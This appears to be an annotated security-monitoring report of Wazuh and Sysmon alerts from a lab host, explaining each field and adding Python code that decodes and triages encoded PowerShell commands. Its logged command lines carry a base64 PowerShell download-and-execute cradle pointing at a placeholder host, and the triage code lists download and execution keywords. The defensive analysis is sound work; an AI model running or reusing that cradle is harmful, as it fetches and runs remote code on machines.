data.win.eventdata.description:  Windows PowerShell
Description from the binary's version resource. Attacker-controllable in a renamed or patched file, so corroborate with the hash.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the version resource. Same caveat as description: cosmetic, not proof.

data.win.eventdata.company:  Microsoft Corporation
Company name from the version resource. Same caveat: cosmetic, not proof.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name from the PE version resource. It survives renaming, so PowerShell.EXE under an image path that isn't powershell.exe means a renamed copy.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact command line of the new process. powershell.exe is handed its own path again as the first argument, runs with -NoLogo -NoProfile, and takes an -EncodedCommand: base64 of the script as UTF-16LE. Decode it before judging the alert; here it decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-run cradle.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. A user's profile root or Temp is typical for interactive sessions and for dropped tooling alike.

data.win.eventdata.user:  Attacker\\Attcker1
Account (DOMAIN\user) the process runs as.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon ID for the logon session. Same value = same session across events; pivot to the Security 4624 that created it.

data.win.eventdata.logonId:  0x26584
Windows logon session ID (hex). Matches the Logon ID in Security event 4624 for the session this ran in.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 = services and other non-interactive logons; 1 and up = an interactive desktop or RDP session.

data.win.eventdata.integrityLevel:  Medium
Process integrity level: Low, Medium (standard user), High (elevated admin) or System. Medium here means no elevation yet.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hashes of the image as configured in Sysmon (SHA256 only here). For a Microsoft binary, compare against a known-good copy of the same build before trusting the path.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd21-680a-440b-000000000e00}
Sysmon GUID of the parent process. Join it to that process's own EID 1 to walk the tree upward.

data.win.eventdata.parentProcessId:  11516
PID of the parent at spawn time. Recycled like any PID; prefer parentProcessGuid.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that spawned this process. powershell.exe spawning powershell.exe is what trips this rule.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The parent's full command line. Identical to commandLine: the parent ran the same encoded payload, so this is a chain of identical PowerShell launches (PID 11516 spawned PID 2020 here).

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account that owns the parent process. Same user as the child here; a change would mean a logon boundary was crossed.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
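The encoded payload in data.win.eventdata.commandLine is base64 of UTF-16LE text, so it has to be decoded as such before the alert can be judged. The following is an added worked example, not SOCscribe or Wazuh code, that pulls the -EncodedCommand argument out of the command line exactly as this report shows it (Wazuh's JSON escaping included), decodes it, and flags the download-and-execute pattern. The sample input is the commandLine value from this alert; the unescape helper, the marker lists and the verdict shape are my own assumptions.

```python
import base64
import re
from typing import Optional

# Constructed sample: the commandLine value exactly as this report shows it,
# still carrying Wazuh's JSON escaping (\" and \\). Base64 is split only for width.
SAMPLE_COMMAND_LINE = (
    r'\"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" '
    r'\"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" '
    '-NoLogo -NoProfile -EncodedCommand '
    'SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A'
    'RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA'
    'ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA'
)

# Phrases that fetch content from the network, and a pattern that executes a
# string. Both present in one script is the classic download cradle. These
# lists are an illustrative minimum (assumption), not an exhaustive detection.
FETCH_MARKERS = ("downloadstring", "downloadfile", "net.webclient",
                 "invoke-webrequest", "invoke-restmethod", "start-bitstransfer")
EXEC_PATTERN = re.compile(r"\biex\b|invoke-expression")


def unescape_wazuh(value: str) -> str:
    """Undo the JSON-style escaping Wazuh leaves in string fields."""
    return value.replace('\\"', '"').replace("\\\\", "\\")


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the argument of -EncodedCommand, or None if the switch is absent.

    powershell.exe accepts -e, -ec and any unambiguous prefix of EncodedCommand,
    with either '-' or '/' as the switch character, so all of those are matched.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if len(tok) < 2 or tok[0] not in "-/":
            continue
        name = tok[1:].lower()
        if name == "ec" or "encodedcommand".startswith(name):
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as UTF-16LE, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def triage(raw_command_line: str) -> dict:
    """Decode the payload (if any) and decide whether it is a download cradle."""
    command_line = unescape_wazuh(raw_command_line)
    b64 = extract_encoded_command(command_line)
    if b64 is None:
        return {"encoded": False, "script": None, "urls": [], "download_cradle": False}
    try:
        script = decode_encoded_command(b64)
    except (ValueError, UnicodeDecodeError):
        # Malformed base64 after -EncodedCommand is itself worth a look.
        return {"encoded": True, "script": None, "urls": [], "download_cradle": False}
    lowered = script.lower()
    fetches = any(marker in lowered for marker in FETCH_MARKERS)
    executes = EXEC_PATTERN.search(lowered) is not None
    return {
        "encoded": True,
        "script": script,
        "urls": re.findall(r"https?://[^\s'\"()]+", script),
        "download_cradle": fetches and executes,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_COMMAND_LINE)
    print(result["script"])
    print("download cradle:", result["download_cradle"], "urls:", result["urls"])
```

Run it against the commandLine value of any Sysmon EID 1 alert in this report; the decoded script and the URL it reaches for are what the analyst needs to record, and the URL is what to block and hunt for in proxy and DNS logs.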

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:30.318+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:30.318+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  56
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534250.1417547
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the fields below follow the Sysmon schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that ETW provider. Filter on it when the provider name is missing or renamed.

data.win.system.eventID:  11
Sysmon event ID, not a Security-log ID like 4624/4688: 1 = Process Create, 3 = Network Connect, 11 = FileCreate, 13 = Registry Value Set. This alert is EID 11, a file was written.

data.win.system.version:  2
Schema version of this event type. Field layout can change between Sysmon releases, so check it before trusting a parser.

data.win.system.level:  4
Numeric log level (4 = Informational). Sysmon writes almost everything at 4, so don't triage on it.

data.win.system.task:  11
Task category number. For Sysmon events it mirrors the event ID (11 here), so it adds nothing eventID didn't.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:28.5074564Z
When the record was written to the Windows log (UTC, 100 ns precision). Compare with data.win.eventdata.utcTime to see Sysmon's buffering delay.

data.win.system.eventRecordID:  283821
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process in the alert. It is the same value on every Sysmon event from this host.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Only needed in deep forensics.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Microsoft-Windows-Sysmon/Operational is Sysmon's own log; open it in Event Viewer to read the neighbouring records.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch means a renamed host or a forwarded log.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:28.496 ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} ProcessId: 2020 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1d1jb0yp.gxm.ps1 CreationUtcTime: 2025-04-24 22:37:28.496 User: Attacker\Attcker1"
Full rendered Sysmon FileCreate text. Every data.win.eventdata.* field below is parsed out of it; go back to this when a parsed value looks escaped or cut off.

data.win.eventdata.utcTime:  2025-04-24 22:37:28.496
Sysmon's own UTC timestamp for the file write, to the millisecond. The most precise "when" in the alert; the top-level timestamp is when Wazuh ingested it.

data.win.eventdata.processGuid:  {94294ddc-bd26-680a-460b-000000000e00}
Sysmon's unique ID for the writing process. It is the same GUID as the EID 1 above, so this file was written by the PowerShell that ran the encoded command.

data.win.eventdata.processId:  2020
Windows PID of the writing process. PIDs are recycled, so correlate on processGuid, not on this.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that wrote the file. powershell.exe here.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1d1jb0yp.gxm.ps1
Path of the file that was created. __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder is written by powershell.exe itself at startup to probe AppLocker/WDAC script enforcement and is then deleted: a known benign artefact, not a dropped tool. The rule's T1105 label is driven by the folder, so judge the alert on the process that wrote the file.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:28.496
The file's creation timestamp as seen by Sysmon. Equal to UtcTime means a brand-new file; earlier means an existing file was overwritten.

data.win.eventdata.user:  Attacker\\Attcker1
Account (DOMAIN\user) that owns the writing process.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
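Rule 92213 labels any file written under a folder it considers suspicious as T1105, but the file here, __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder, is what powershell.exe itself writes at startup to test AppLocker/WDAC script enforcement, and the same artefact appears in every PowerShell launch in this report. What makes the event worth keeping is the process that wrote it, which the ProcessGuid ties to the EID 1 alert above. The following is an added worked example, not SOCscribe or Wazuh code, that parses the rendered Sysmon message text into fields, recognises the policy-probe artefact, and joins the FileCreate to its creating process before deciding whether to escalate. The two sample messages are abridged copies of the EID 1 and EID 11 messages in this report (the encoded payload is shortened to a placeholder and only the fields the example needs are kept); the key list, the probe pattern and the verdict rules are my own assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed samples, abridged from the Sysmon messages in this report: the
# EID 1 for PID 2020 and the EID 11 that PID 2020 produced. The base64 payload
# is cut to a placeholder because only the presence of -EncodedCommand matters.
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    (1, "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:26.762 "
        "ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} ProcessId: 2020 "
        "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
        "CommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" "
        "-NoLogo -NoProfile -EncodedCommand SQBFAFgA... "
        "User: Attacker\\Attcker1 IntegrityLevel: Medium "
        "ParentProcessGuid: {94294ddc-bd21-680a-440b-000000000e00} ParentProcessId: 11516 "
        "ParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    (11, "File created: RuleName: - UtcTime: 2025-04-24 22:37:28.496 "
         "ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} ProcessId: 2020 "
         "Image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
         "TargetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\"
         "__PSScriptPolicyTest_1d1jb0yp.gxm.ps1 "
         "CreationUtcTime: 2025-04-24 22:37:28.496 User: Attacker\\Attcker1"),
]

# Field names Sysmon renders in EID 1 and EID 11 messages. Values can contain
# spaces and colons (command lines, version strings), so the text is split only
# in front of a known key followed by ': '.
SYSMON_KEYS = (
    "RuleName", "UtcTime", "ProcessGuid", "ProcessId", "Image", "FileVersion",
    "Description", "Product", "Company", "OriginalFileName", "CommandLine",
    "CurrentDirectory", "User", "LogonGuid", "LogonId", "TerminalSessionId",
    "IntegrityLevel", "Hashes", "ParentProcessGuid", "ParentProcessId",
    "ParentImage", "ParentCommandLine", "ParentUser", "TargetFilename",
    "CreationUtcTime",
)
_KEY_BOUNDARY = re.compile(r"\s(?=(?:%s):\s)" % "|".join(SYSMON_KEYS))

# powershell.exe writes __PSScriptPolicyTest_<random>.<random>.ps1 to %TEMP% at
# startup to learn whether AppLocker/WDAC enforces scripts, then removes it.
_PS_POLICY_PROBE = re.compile(
    r"\\AppData\\Local\\Temp\\__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$",
    re.IGNORECASE,
)


def parse_sysmon_message(message: str) -> Dict[str, str]:
    """Turn the one-line rendered Sysmon text into {field: value}."""
    event_name, _, body = message.partition(": ")
    fields = {"EventName": event_name}
    for chunk in _KEY_BOUNDARY.split(body):
        key, _, value = chunk.partition(": ")
        fields[key] = value.strip()
    return fields


def is_powershell_policy_probe(target: str, image: str) -> bool:
    """True when the file is PowerShell's own startup probe, written by PowerShell."""
    return (_PS_POLICY_PROBE.search(target) is not None
            and image.lower().endswith(("\\powershell.exe", "\\pwsh.exe")))


def has_encoded_command(command_line: str) -> bool:
    """Presence test for -EncodedCommand and its -e / -ec / prefix spellings."""
    for tok in command_line.split():
        if len(tok) > 1 and tok[0] in "-/":
            name = tok[1:].lower()
            if name == "ec" or "encodedcommand".startswith(name):
                return True
    return False


def triage_file_creates(events: List[Tuple[int, str]]) -> List[dict]:
    """Index EID 1 by ProcessGuid, then judge each EID 11 by who wrote the file."""
    processes = {}
    for event_id, message in events:
        if event_id == 1:
            fields = parse_sysmon_message(message)
            processes[fields["ProcessGuid"]] = fields

    verdicts = []
    for event_id, message in events:
        if event_id != 11:
            continue
        f = parse_sysmon_message(message)
        creator = processes.get(f["ProcessGuid"])
        noise = is_powershell_policy_probe(f["TargetFilename"], f["Image"])
        reasons = ["target is PowerShell's AppLocker/WDAC policy probe, not a dropped tool"] if noise else []
        process_flags = []
        if creator is None:
            reasons.append("no EID 1 for this ProcessGuid; creator unknown, keep the alert open")
        else:
            if has_encoded_command(creator.get("CommandLine", "")):
                process_flags.append("creator ran with -EncodedCommand")
            if creator.get("ParentImage", "").lower().endswith("\\powershell.exe"):
                process_flags.append("creator was itself spawned by powershell.exe")
            reasons.extend(process_flags)
        verdicts.append({
            "target": f["TargetFilename"],
            "process_guid": f["ProcessGuid"],
            "file_is_noise": noise,
            # Escalate on the process, never on the probe file alone.
            "escalate": creator is None or bool(process_flags),
            "reasons": reasons,
        })
    return verdicts


if __name__ == "__main__":
    for verdict in triage_file_creates(SAMPLE_EVENTS):
        print(verdict)
```

The verdict for this report's pair is file_is_noise = True and escalate = True: the .ps1 itself should not drive the T1105 label, but its creator is a powershell.exe launched by powershell.exe with an encoded payload, and that is what the ticket should be about. The same parser works on the full, unabridged data.win.system.message strings in this report, since the split points are the documented Sysmon field names.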

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:37:33.196+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:33.196+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.5.6']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
CIS Critical Security Controls mapping (v8 control 8.5 = collect detailed audit logs).

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534253.1420312
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26156
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Special Logon' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports when a special logon is used. A special logon is a logon that has administrator-equivalent privileges and can be used to elevate a process to a higher level. Events for this subcategory include: - 4964 : Special groups have been assigned to a new logon. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Logon/Logoff\Audit Special Logon
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.5.6
Section of the CIS benchmark this check implements (17.5.6 = Audit Special Logon in the Windows 11 Enterprise benchmark).

data.sca.check.compliance.cis_csc:  8.5
CIS Critical Security Controls mapping (v8 control 8.5 = collect detailed audit logs).

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Special Logon"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
Outcome of the check: passed, failed, or not applicable. "not applicable" is not a pass; here it means the check could not run at all, so see check.reason before closing this.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Special Logon"'
Why the result is not a clean pass/fail. A timeout means the agent's SCA run could not finish auditpol.exe in time, so the host's audit policy was not actually evaluated: the setting may still be fine, or it may have drifted. Re-run the command from data.sca.check.command by hand on the host and confirm "Special Logon" still shows Success.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:34.157+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:34.157+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  53
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534254.1423149
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the fields below follow the Sysmon schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that ETW provider. Filter on it when the provider name is missing or renamed.

data.win.system.eventID:  1
Sysmon event ID, not a Security-log ID like 4624/4688: 1 = Process Create, 3 = Network Connect, 11 = FileCreate, 13 = Registry Value Set. This alert is EID 1, a process start.

data.win.system.version:  5
Schema version of this event type. Field layout can change between Sysmon releases, so check it before trusting a parser.

data.win.system.level:  4
Numeric log level (4 = Informational). Sysmon writes almost everything at 4, so don't triage on it.

data.win.system.task:  1
Task category number. For Sysmon events it mirrors the event ID (1 here), so it adds nothing eventID didn't.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:31.5031620Z
When the record was written to the Windows log (UTC, 100 ns precision). Compare with data.win.eventdata.utcTime to see Sysmon's buffering delay.

data.win.system.eventRecordID:  283846
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process in the alert. It is the same value on every Sysmon event from this host.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Only needed in deep forensics.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Microsoft-Windows-Sysmon/Operational is Sysmon's own log; open it in Event Viewer to read the neighbouring records.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch means a renamed host or a forwarded log.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:30.168 ProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00} ProcessId: 10656 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} ParentProcessId: 2020 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full rendered Sysmon Process Create text. Every data.win.eventdata.* field below is parsed out of it; go back to this when a parsed value looks escaped or cut off.

data.win.eventdata.utcTime:  2025-04-24 22:37:30.168
Sysmon's own UTC timestamp for the process start, to the millisecond. The most precise "when" in the alert; the top-level timestamp is when Wazuh ingested it.

data.win.eventdata.processGuid:  {94294ddc-bd2a-680a-490b-000000000e00}
Sysmon's unique ID for the new process (survives PID reuse). Pivot on it to find every file, network and registry event this process went on to produce.

data.win.eventdata.processId:  10656
Windows PID of the new process. PIDs are recycled, so correlate on processGuid, not on this.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started. Check it is the real System32 binary and not a same-named copy elsewhere.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
